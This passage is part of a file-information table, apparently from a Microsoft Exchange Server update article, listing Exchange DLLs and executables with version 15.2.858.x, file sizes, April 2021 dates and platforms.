x86 \nMicrosoft.exchange.loguploader.dll| 15.2.858.9| 165,256| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.858.9| 54,656| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.858.10| 9,055,616| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.858.9| 33,160| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.858.10| 124,304| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.858.9| 82,824| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.858.10| 30,088| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.858.10| 661,384| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.858.10| 63,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.858.10| 175,488| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.858.10| 2,791,808| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.858.10| 53,128| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.858.10| 151,936| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.858.10| 966,528| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.858.10| 185,224| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.858.9| 31,616| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.858.10| 39,816| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.858.10| 105,856| 04-Apr-2021| 08:39| x86 
\nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.858.10| 95,104| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.858.10| 43,400| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.858.10| 172,936| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.858.10| 102,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.858.10| 98,696| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.858.10| 188,824| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.858.10| 43,400| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.858.9| 447,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.858.10| 89,992| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.858.10| 107,928| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.858.10| 371,088| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.858.10| 193,928| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.858.10| 552,320| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.858.9| 16,256| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.858.9| 15,736| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.858.10| 321,416| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x64 
\nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.858.10| 45,464| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.858.10| 18,296| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.858.9| 20,888| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.858.9| 415,112| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.858.9| 1,269,648| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.858.10| 39,312| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.858.9| 433,528| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.858.10| 4,566,400| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.858.9| 261,000| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.858.9| 33,672| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.858.9| 94,096| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.858.10| 586,136| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.858.9| 3,543,424| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.858.10| 67,992| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.dll| 15.2.858.10| 16,496,008| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.858.10| 58,776| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.858.10| 23,952| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.858.10| 101,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.858.10| 543,624| 
04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.858.10| 305,024| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.858.9| 273,800| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.858.10| 418,688| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.858.10| 275,856| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.858.10| 70,536| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.858.9| 7,873,944| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.858.10| 1,502,096| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.858.10| 71,576| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.858.10| 1,249,152| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.858.10| 1,876,872| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.858.9| 5,366,656| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.858.9| 36,224| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.858.9| 117,624| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.858.10| 209,792| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.858.9| 79,744| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.858.10| 156,056| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.858.10| 65,944| 04-Apr-2021| 08:40| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.858.9| 30,600| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.858.10| 58,248| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.858.10| 
29,576| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.858.10| 175,512| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.858.10| 28,568| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.858.10| 75,144| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.858.10| 207,240| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.858.10| 440,712| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.858.10| 83,336| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.858.10| 35,224| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.858.10| 53,128| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.858.10| 96,656| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.migration.dll| 15.2.858.10| 1,110,424| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.858.9| 14,712| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.858.10| 135,576| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.858.10| 5,065,600| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.858.9| 68,480| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.net.dll| 15.2.858.9| 5,086,104| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.858.9| 265,608| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.858.9| 37,768| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.858.9| 14,200| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.858.10| 549,776| 
04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.858.9| 22,920| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.858.10| 106,392| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.858.9| 291,736| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.858.9| 277,912| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.odata.dll| 15.2.858.10| 2,993,536| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.858.9| 90,496| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.858.9| 101,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.858.9| 38,272| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.858.9| 45,456| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.858.9| 58,240| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.858.9| 147,336| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.858.9| 26,496| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.858.9| 184,208| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.858.9| 26,496| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.858.9| 38,288| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.858.9| 55,688| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.858.9| 147,320| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.858.9| 191,880| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.858.9| 33,688| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.858.9| 28,040| 
04-Apr-2021| 08:43| x86
Microsoft.exchange.passivemonitoringsettings.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:32| x86
Microsoft.exchange.photogarbagecollectionservicelet.dll| 15.2.858.10| 15,240| 04-Apr-2021| 08:38| x86
Microsoft.exchange.pop3.eventlog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:34| x64
Microsoft.exchange.pop3.eventlog.dll.fe| 15.2.858.9| 17,280| 04-Apr-2021| 08:34| Not applicable
Microsoft.exchange.pop3.exe| 15.2.858.9| 106,888| 04-Apr-2021| 08:27| x86
Microsoft.exchange.pop3.exe.fe| 15.2.858.9| 106,888| 04-Apr-2021| 08:27| Not applicable
Microsoft.exchange.pop3service.exe| 15.2.858.9| 24,976| 04-Apr-2021| 08:27| x86
Microsoft.exchange.pop3service.exe.fe| 15.2.858.9| 24,976| 04-Apr-2021| 08:27| Not applicable
Microsoft.exchange.popconfiguration.dll| 15.2.858.9| 42,888| 04-Apr-2021| 08:32| Not applicable
Microsoft.exchange.popimap.core.dll| 15.2.858.9| 264,600| 04-Apr-2021| 08:29| x86
Microsoft.exchange.popimap.core.dll.fe| 15.2.858.9| 264,600| 04-Apr-2021| 08:29| Not applicable
Microsoft.exchange.powersharp.dll| 15.2.858.9| 358,280| 04-Apr-2021| 08:33| x86
Microsoft.exchange.powersharp.management.dll| 15.2.858.10| 4,166,528| 04-Apr-2021| 08:33| x86
Microsoft.exchange.powershell.configuration.dll| 15.2.858.10| 308,632| 04-Apr-2021| 08:44| x64
Microsoft.exchange.powershell.rbachostingtools.dll| 15.2.858.10| 41,344| 04-Apr-2021| 08:27| x86
Microsoft.exchange.protectedservicehost.exe| 15.2.858.9| 30,584| 04-Apr-2021| 08:39| x86
Microsoft.exchange.protocols.fasttransfer.dll| 15.2.858.9| 137,088| 04-Apr-2021| 08:31| x86
Microsoft.exchange.protocols.mapi.dll| 15.2.858.9| 441,736| 04-Apr-2021| 08:30| x86
Microsoft.exchange.provisioning.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:28| x64
Microsoft.exchange.provisioningagent.dll| 15.2.858.10| 224,664| 04-Apr-2021| 08:35| x86
Microsoft.exchange.provisioningservicelet.dll| 15.2.858.10| 105,864| 04-Apr-2021| 08:39| x86
Microsoft.exchange.pst.dll| 15.2.858.9| 168,840| 04-Apr-2021| 08:27| x86
Microsoft.exchange.pst.dll.deploy| 15.2.858.9| 168,840| 04-Apr-2021| 08:27| Not applicable
Microsoft.exchange.pswsclient.dll| 15.2.858.9| 259,472| 04-Apr-2021| 08:32| x86
Microsoft.exchange.publicfolders.dll| 15.2.858.9| 72,072| 04-Apr-2021| 08:32| x86
Microsoft.exchange.pushnotifications.crimsonevents.dll| 15.2.858.9| 215,952| 04-Apr-2021| 08:37| x64
Microsoft.exchange.pushnotifications.dll| 15.2.858.9| 106,872| 04-Apr-2021| 08:33| x86
Microsoft.exchange.pushnotifications.publishers.dll| 15.2.858.9| 425,856| 04-Apr-2021| 08:32| x86
Microsoft.exchange.pushnotifications.server.dll| 15.2.858.9| 70,520| 04-Apr-2021| 08:29| x86
Microsoft.exchange.query.analysis.dll| 15.2.858.10| 46,472| 04-Apr-2021| 08:39| x86
Microsoft.exchange.query.configuration.dll| 15.2.858.9| 215,944| 04-Apr-2021| 08:36| x86
Microsoft.exchange.query.core.dll| 15.2.858.10| 168,832| 04-Apr-2021| 08:33| x86
Microsoft.exchange.query.ranking.dll| 15.2.858.10| 343,424| 04-Apr-2021| 08:32| x86
Microsoft.exchange.query.retrieval.dll| 15.2.858.10| 174,488| 04-Apr-2021| 08:33| x86
Microsoft.exchange.query.suggestions.dll| 15.2.858.10| 95,112| 04-Apr-2021| 08:39| x86
Microsoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.858.10| 127,360| 04-Apr-2021| 08:38| x86
Microsoft.exchange.relevance.core.dll| 15.2.858.9| 63,368| 04-Apr-2021| 08:32| x86
Microsoft.exchange.relevance.data.dll| 15.2.858.9| 36,728| 04-Apr-2021| 08:43| x64
Microsoft.exchange.relevance.mailtagger.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:43| x64
Microsoft.exchange.relevance.people.dll| 15.2.858.10| 9,666,968| 04-Apr-2021| 08:33| x86
Microsoft.exchange.relevance.peopleindex.dll| 15.2.858.9| 20,788,120| 04-Apr-2021| 08:43| x64
Microsoft.exchange.relevance.peopleranker.dll| 15.2.858.9| 36,728| 04-Apr-2021| 08:39| x86
Microsoft.exchange.relevance.perm.dll| 15.2.858.9| 97,672| 04-Apr-2021| 08:32| x64
Microsoft.exchange.relevance.sassuggest.dll| 15.2.858.9| 28,552| 04-Apr-2021| 08:34| x64
Microsoft.exchange.relevance.upm.dll| 15.2.858.9| 72,088| 04-Apr-2021| 08:33| x64
Microsoft.exchange.routing.client.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:38| x86
Microsoft.exchange.routing.eventlog.dll| 15.2.858.9| 13,184| 04-Apr-2021| 08:33| x64
Microsoft.exchange.routing.server.exe| 15.2.858.9| 59,280| 04-Apr-2021| 08:39| x86
Microsoft.exchange.rpc.dll| 15.2.858.9| 1,647,496| 04-Apr-2021| 08:29| x64
Microsoft.exchange.rpcclientaccess.dll| 15.2.858.9| 209,816| 04-Apr-2021| 08:30| x86
Microsoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.858.9| 60,288| 04-Apr-2021| 08:29| x86
Microsoft.exchange.rpcclientaccess.handler.dll| 15.2.858.9| 518,024| 04-Apr-2021| 08:44| x86
Microsoft.exchange.rpcclientaccess.monitoring.dll| 15.2.858.9| 161,160| 04-Apr-2021| 08:31| x86
Microsoft.exchange.rpcclientaccess.parser.dll| 15.2.858.9| 724,360| 04-Apr-2021| 08:29| x86
Microsoft.exchange.rpcclientaccess.server.dll| 15.2.858.9| 243,088| 04-Apr-2021| 08:31| x86
Microsoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.858.9| 20,888| 04-Apr-2021| 08:29| x64
Microsoft.exchange.rpcclientaccess.service.exe| 15.2.858.10| 35,216| 04-Apr-2021| 08:39| x86
Microsoft.exchange.rpchttpmodules.dll| 15.2.858.9| 42,376| 04-Apr-2021| 08:38| x86
Microsoft.exchange.rpcoverhttpautoconfig.dll| 15.2.858.10| 56,216| 04-Apr-2021| 08:39| x86
Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.858.9| 27,544| 04-Apr-2021| 08:32| x64
Microsoft.exchange.rules.common.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:30| x86
Microsoft.exchange.saclwatcher.eventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:27| x64
Microsoft.exchange.saclwatcherservicelet.dll| 15.2.858.10| 20,360| 04-Apr-2021| 08:39| x86
Microsoft.exchange.safehtml.dll| 15.2.858.9| 21,384| 04-Apr-2021| 08:39| x86
Microsoft.exchange.sandbox.activities.dll| 15.2.858.9| 267,672| 04-Apr-2021| 08:39| x86
Microsoft.exchange.sandbox.contacts.dll| 15.2.858.9| 111,000| 04-Apr-2021| 08:39| x86
Microsoft.exchange.sandbox.core.dll| 15.2.858.9| 112,520| 04-Apr-2021| 08:32| x86
Microsoft.exchange.sandbox.services.dll| 15.2.858.9| 622,472| 04-Apr-2021| 08:32| x86
Microsoft.exchange.search.bigfunnel.dll| 15.2.858.10| 185,224| 04-Apr-2021| 08:34| x86
Microsoft.exchange.search.bigfunnel.eventlog.dll| 15.2.858.9| 12,168| 04-Apr-2021| 08:39| x64
Microsoft.exchange.search.blingwrapper.dll| 15.2.858.9| 19,320| 04-Apr-2021| 08:34| x86
Microsoft.exchange.search.core.dll| 15.2.858.9| 211,864| 04-Apr-2021| 08:36| x86
Microsoft.exchange.search.ediscoveryquery.dll| 15.2.858.10| 17,800| 04-Apr-2021| 08:32| x86
Microsoft.exchange.search.engine.dll| 15.2.858.9| 97,672| 04-Apr-2021| 08:34| x86
Microsoft.exchange.search.fast.configuration.dll| 15.2.858.9| 16,792| 04-Apr-2021| 08:38| x86
Microsoft.exchange.search.fast.dll| 15.2.858.9| 436,616| 04-Apr-2021| 08:33| x86
Microsoft.exchange.search.files.dll| 15.2.858.10| 274,304| 04-Apr-2021| 08:31| x86
Microsoft.exchange.search.flighting.dll| 15.2.858.9| 24,968| 04-Apr-2021| 08:39| x86
Microsoft.exchange.search.mdb.dll| 15.2.858.9| 218,008| 04-Apr-2021| 08:43| x86
Microsoft.exchange.search.service.exe| 15.2.858.9| 26,520| 04-Apr-2021| 08:39| x86
Microsoft.exchange.security.applicationencryption.dll| 15.2.858.9| 221,056| 04-Apr-2021| 08:30| x86
Microsoft.exchange.security.dll| 15.2.858.9| 1,559,960| 04-Apr-2021| 08:30| x86
Microsoft.exchange.security.msarpsservice.exe| 15.2.858.9| 19,840| 04-Apr-2021| 08:39| x86
Microsoft.exchange.security.securitymsg.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:43| x64
Microsoft.exchange.server.storage.admininterface.dll| 15.2.858.9| 225,152| 04-Apr-2021| 08:32| x86
Microsoft.exchange.server.storage.common.dll| 15.2.858.9| 5,151,120| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.diagnostics.dll| 15.2.858.9| 214,920| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.directoryservices.dll| 15.2.858.9| 115,576| 04-Apr-2021| 08:30| x86
Microsoft.exchange.server.storage.esebackinterop.dll| 15.2.858.9| 82,824| 04-Apr-2021| 08:44| x64
Microsoft.exchange.server.storage.eventlog.dll| 15.2.858.9| 80,768| 04-Apr-2021| 08:39| x64
Microsoft.exchange.server.storage.fulltextindex.dll| 15.2.858.9| 66,440| 04-Apr-2021| 08:30| x86
Microsoft.exchange.server.storage.ha.dll| 15.2.858.9| 81,288| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.lazyindexing.dll| 15.2.858.9| 211,840| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.logicaldatamodel.dll| 15.2.858.9| 1,341,320| 04-Apr-2021| 08:29| x86
Microsoft.exchange.server.storage.mapidisp.dll| 15.2.858.9| 511,864| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.multimailboxsearch.dll| 15.2.858.9| 47,488| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.physicalaccess.dll| 15.2.858.9| 873,856| 04-Apr-2021| 08:30| x86
Microsoft.exchange.server.storage.propertydefinitions.dll| 15.2.858.9| 1,352,584| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.propertytag.dll| 15.2.858.9| 30,600| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.rpcproxy.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:39| x86
Microsoft.exchange.server.storage.storecommonservices.dll| 15.2.858.9| 1,018,776| 04-Apr-2021| 08:31| x86
Microsoft.exchange.server.storage.storeintegritycheck.dll| 15.2.858.9| 111,480| 04-Apr-2021| 08:30| x86
Microsoft.exchange.server.storage.workermanager.dll| 15.2.858.9| 34,696| 04-Apr-2021| 08:39| x86
Microsoft.exchange.server.storage.xpress.dll| 15.2.858.9| 19,328| 04-Apr-2021| 08:30| x86
Microsoft.exchange.servicehost.eventlog.dll| 15.2.858.9| 14,720| 04-Apr-2021| 08:34| x64
Microsoft.exchange.servicehost.exe| 15.2.858.10| 60,824| 04-Apr-2021| 08:33| x86
Microsoft.exchange.servicelets.globallocatorcache.dll| 15.2.858.9| 50,576| 04-Apr-2021| 08:38| x86
Microsoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:33| x64
Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:28| x64
Microsoft.exchange.services.common.dll| 15.2.858.10| 74,120| 04-Apr-2021| 08:30| x86
Microsoft.exchange.services.dll| 15.2.858.10| 8,480,656| 04-Apr-2021| 08:38| x86
Microsoft.exchange.services.eventlogs.dll| 15.2.858.9| 30,088| 04-Apr-2021| 08:33| x64
Microsoft.exchange.services.ewshandler.dll| 15.2.858.10| 633,728| 04-Apr-2021| 08:31| x86
Microsoft.exchange.services.ewsserialization.dll| 15.2.858.10| 1,651,064| 04-Apr-2021| 08:36| x86
Microsoft.exchange.services.json.dll| 15.2.858.10| 296,344| 04-Apr-2021| 08:31| x86
Microsoft.exchange.services.messaging.dll| 15.2.858.10| 43,392| 04-Apr-2021| 08:30| x86
Microsoft.exchange.services.onlinemeetings.dll| 15.2.858.9| 233,336| 04-Apr-2021| 08:43| x86
Microsoft.exchange.services.surface.dll| 15.2.858.10| 178,560| 04-Apr-2021| 08:31| x86
Microsoft.exchange.services.wcf.dll| 15.2.858.10| 348,560| 04-Apr-2021| 08:31| x86
Microsoft.exchange.setup.acquirelanguagepack.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:29| x86
Microsoft.exchange.setup.bootstrapper.common.dll| 15.2.858.9| 93,064| 04-Apr-2021| 08:30| x86
Microsoft.exchange.setup.common.dll| 15.2.858.10| 296,328| 04-Apr-2021| 08:39| x86
Microsoft.exchange.setup.commonbase.dll| 15.2.858.10| 35,736| 04-Apr-2021| 08:39| x86
Microsoft.exchange.setup.console.dll| 15.2.858.10| 27,032| 04-Apr-2021| 08:39| x86
Microsoft.exchange.setup.gui.dll| 15.2.858.10| 114,584| 04-Apr-2021| 08:39| x86
Microsoft.exchange.setup.parser.dll| 15.2.858.10| 53,648| 04-Apr-2021| 08:39| x86
Microsoft.exchange.setup.signverfwrapper.dll| 15.2.858.9| 75,136| 04-Apr-2021| 08:30| x64
Microsoft.exchange.sharedcache.caches.dll| 15.2.858.9| 142,712| 04-Apr-2021| 08:39| x86
Microsoft.exchange.sharedcache.client.dll| 15.2.858.9| 24,960| 04-Apr-2021| 08:43| x86
Microsoft.exchange.sharedcache.eventlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:28| x64
Microsoft.exchange.sharedcache.exe| 15.2.858.9| 58,768| 04-Apr-2021| 08:39| x86
Microsoft.exchange.sharepointsignalstore.dll| 15.2.858.9| 27,016| 04-Apr-2021| 08:32| x86
Microsoft.exchange.slabmanifest.dll| 15.2.858.9| 46,976| 04-Apr-2021| 08:30| x86
Microsoft.exchange.sqm.dll| 15.2.858.9| 46,968| 04-Apr-2021| 08:31| x86
Microsoft.exchange.store.service.exe| 15.2.858.9| 28,032| 04-Apr-2021| 08:38| x86
Microsoft.exchange.store.worker.exe| 15.2.858.9| 26,504| 04-Apr-2021| 08:44| x86
Microsoft.exchange.storeobjectsservice.eventlog.dll| 15.2.858.9| 13,696| 04-Apr-2021| 08:34| x64
Microsoft.exchange.storeobjectsservice.exe| 15.2.858.9| 31,640| 04-Apr-2021| 08:39| x86
Microsoft.exchange.storeprovider.dll| 15.2.858.9| 1,205,128| 04-Apr-2021| 08:32| x86
Microsoft.exchange.structuredquery.dll| 15.2.858.9| 158,600| 04-Apr-2021| 08:32| x64
Microsoft.exchange.symphonyhandler.dll| 15.2.858.10| 628,104| 04-Apr-2021| 08:33| x86
Microsoft.exchange.syncmigration.eventlog.dll| 15.2.858.9| 13,176| 04-Apr-2021| 08:27| x64
Microsoft.exchange.syncmigrationservicelet.dll| 15.2.858.10| 16,256| 04-Apr-2021| 08:39| x86
